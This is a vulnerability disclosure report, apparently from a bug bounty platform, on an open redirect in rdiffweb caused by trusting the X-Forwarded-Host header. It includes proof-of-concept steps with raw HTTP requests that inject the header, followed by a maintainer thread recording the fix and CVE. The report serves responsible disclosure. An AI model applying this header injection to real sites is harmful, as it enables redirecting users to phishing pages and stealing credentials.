Open Redirect using Host header Injection in ikus060/rdiffweb

Valid

Reported on

Nov 27th 2022


Description

A web server commonly hosts several web applications on the same IP address, referring to each application via the virtual host. In an incoming HTTP request, web servers often dispatch the request to the target virtual host based on the value supplied in the Host header. Without proper validation of the header value, the attacker can supply invalid input to cause the web server to:

Dispatch requests to the first virtual host on the list. Perform a redirect to an attacker-controlled domain. Perform web cache poisoning. Manipulate password reset functionality. Allow access to virtual hosts that were not intended to be externally accessible.

Proof of Concept

1. Go to https://rdiffweb-demo.ikus-soft.com and login using the credentials
2. After logging into the website,  refresh the page and intercept the request using burpsuite. Request will look something like this - 

GET / HTTP/1.1
Host: rdiffweb-demo.ikus-soft.com
Cookie: session_id=38522b2736a9c2f012c30962b9ef4cc772326a23
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:107.0) Gecko/20100101 Firefox/107.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Te: trailers
Connection: close

3. Add a header X-Forwarded-Host: bing.com in the request and send the request -

GET / HTTP/1.1
Host: rdiffweb-demo.ikus-soft.com
X-Forwarded-Host: bing.com
Cookie: session_id=38522b2736a9c2f012c30962b9ef4cc772326a23
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:107.0) Gecko/20100101 Firefox/107.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Te: trailers
Connection: close

4. Search for bing.com in the response and you will see that the paths have changed to bing.com.
5. Right click and select show response in browser. Copy the url and paste it in your browser
6. Now click on any tab like Repositories, status, admin area etc and you will be redirected to bing.com

Proof of Concept -

![Screenshot1](https://drive.google.com/file/d/1TvAl_Fj4qL0ldl7uzbfQagiOFUdsnuXB/view?usp=sharing)
![Screenshot2](https://drive.google.com/file/d/1jBke7umSQlYKp1zYVFuKd6yyl7DDdr4l/view?usp=sharing)
![Screenshot3](https://drive.google.com/file/d/1W2KN_d7EFWYl3TH4ptUE-AGZQq6OIKOf/view?usp=sharing)

Impact

If the app does not validate untrusted user input, an attacker could supply a URL that redirects an unsuspecting victim from a legitimate domain to an attacker's phishing site and can perform different actions like stealing credentials.

References

We are processing your report and will contact the ikus060/rdiffweb team within 24 hours. a month ago
We have contacted a member of the ikus060/rdiffweb team and are waiting to hear back a month ago
Anishka Shukla
a month ago

Researcher


Any updates on it ?

Patrik Dufresne validated this vulnerability a month ago
Anishka Shukla has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Patrik Dufresne
a month ago

Maintainer


Next release should ignore X-Forwarded-Host and only rely on Host header

Anishka Shukla
a month ago

Researcher


Can you please assign CVE on this?

Patrik Dufresne
a month ago

Maintainer


I believe, CVE are now assigned when fixed.

Anishka Shukla
a month ago

Researcher


Okay

Patrik Dufresne marked this as fixed in 2.5.4 with commit 5f8616 25 days ago
Patrik Dufresne has been awarded the fix bounty
This vulnerability has been assigned a CVE
This vulnerability is scheduled to go public on Dec 22nd 2022
Ben Harvie published this vulnerability 19 days ago
to join this conversation